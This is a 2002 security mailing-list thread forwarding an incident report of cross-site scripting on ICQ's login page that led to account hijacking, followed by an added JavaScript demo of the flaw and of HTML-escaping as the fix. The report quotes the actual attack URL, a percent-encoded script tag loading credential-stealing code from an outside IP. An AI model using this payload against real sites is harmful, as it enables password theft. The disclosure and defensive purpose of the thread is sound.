WebApp Sec mailing list archives
Re: Top Ten Web App Sec Problems
From: "Alex Lambert" <alambert () webmaster com>
Date: Mon, 2 Dec 2002 18:44:24 -0600
Here's one from incidents/bugtraq today:

From: "Rafael Coninck Teigao" <rafael () SafeCore NET>
To: "SecurityFocus - Bugtraq" <bugtraq () securityfocus com>; "Security Focus' INCIDENTS" <INCIDENTS () securityfocus com>
Sent: Monday, December 02, 2002 10:29 AM
Subject: [Fwd: XSS on ICQ leading to password compromise]
Moderator: I've sent the following email to bugtraq last week. Haven't seen it on the list, but it came to my attention that even more accounts were hijacked this way. I'm also sending this to incidents, because I think that maybe some administrators are receiving similar complaints from their users and could (perhaps) block the XSS pages somehow.

-------- Original Message --------
From: Rafael Coninck Teigao <rafael () SafeCore NET>
Subject: XSS on ICQ leading to password compromise
To: SecurityFocus - Bugtraq <bugtraq () securityfocus com>
CC: horvath () avalon sul com br, ahi () TELEFONICAEMPRESAS NET BR, nbso () nic br

Hello, pp.

I've tried to find some representative from the ICQ technical staff but had no success so far. Anyway, here's what's happening:

A friend of mine got the following address on his ICQ from a friend on his contact list:
http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<script%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e
We can clearly see the <script... part on it. Unfortunately, he couldn't. When the page opened, he typed his email address and password. Five minutes later he was disconnected from ICQ and was unable to log in again. He then tried to recover his password and saw that it was set to:

aaaaa
a

That's right, it has a new line in it.

The source on the script is: http://200.158.50.245/web/icq.asa

That IP address comes from an ADSL from Telesp. The date and time of the incident were Nov/24 at 20:12 (GMT -2). He also told me that the friend who sent him the address and another person had their accounts hijacked as well.

Best regards,
Rafael Coninck Teigao
SafeCore Network Solutions
http://SafeCore.NET
+55 41 224 1785
--
*snipped footers*

apl

----- Original Message -----
From: "Kevin Spett" <kspett () spidynamics com>
To: "Richard M. Smith" <rms () computerbytesman com>; <webappsec () securityfocus com>
Sent: Monday, December 02, 2002 5:28 PM
Subject: Re: Top Ten Web App Sec Problems
There have been a number of publicized Hotmail problems that were being exploited. This was back when you could send scripted content in an email message and it would get executed. You would open your mail, it'd pop up a window saying "Oh, I'm sorry you'll have to log in again" or something.

Kevin Spett
SPI Labs
http://www.spidynamics.com/
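As an added example (not code from any of the posters, from ICQ, or from the web.icq.com login page), the following JavaScript decodes the karma_err_msg parameter from the URL quoted in Rafael's post the way a browser or server would, shows that reflecting the decoded value into the page unchanged produces a script load from 200.158.50.245, and shows that HTML-escaping it before reflection removes that load. The renderErrorUnsafe and renderErrorSafe functions are a constructed stand-in for the login page's error-message template, whose real code is not known; externalScriptSources is a helper added here to check the rendered output.

```javascript
// Added example, not the original page's or ICQ's code. The URL is the one
// quoted in the post above; the render functions are a constructed
// stand-in for the login page's error-message template.

const POSTED_URL =
  'http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=' +
  '<script%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e';

// Pull one query parameter out of a URL and percent-decode it, which is what
// the server does before the value is reflected into the page. Note that
// "%68%74%74%70" is simply "http": the encoding hides the link from a casual
// reader but decodes to the same bytes the browser will fetch.
function getParam(url, name) {
  const query = url.slice(url.indexOf('?') + 1);
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key === name) {
      return decodeURIComponent(eq === -1 ? '' : pair.slice(eq + 1));
    }
  }
  return null;
}

// Vulnerable pattern: the error text is written into the HTML unchanged.
function renderErrorUnsafe(msg) {
  return `<p class="error">${msg}</p>`;
}

// Hardened pattern: escape the five HTML-significant characters before the
// value is written into element content or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderErrorSafe(msg) {
  return `<p class="error">${escapeHtml(msg)}</p>`;
}

// Collect the src of every <script src=...> in a rendered page: a cheap way
// to check whether a reflected value turned into a script load from elsewhere.
function externalScriptSources(html) {
  const out = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Run the posted URL through both templates and report what each loads.
function demo() {
  const msg = getParam(POSTED_URL, 'karma_err_msg');
  return {
    decoded: msg,
    unsafeScripts: externalScriptSources(renderErrorUnsafe(msg)),
    safeScripts: externalScriptSources(renderErrorSafe(msg)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The unsafe template yields one script source, http://200.158.50.245/web/icq.asa, on the login page's own origin, which is why the stolen credentials could be posted anywhere the script chose; the escaped template yields none, and the decoded text is displayed literally as the error message.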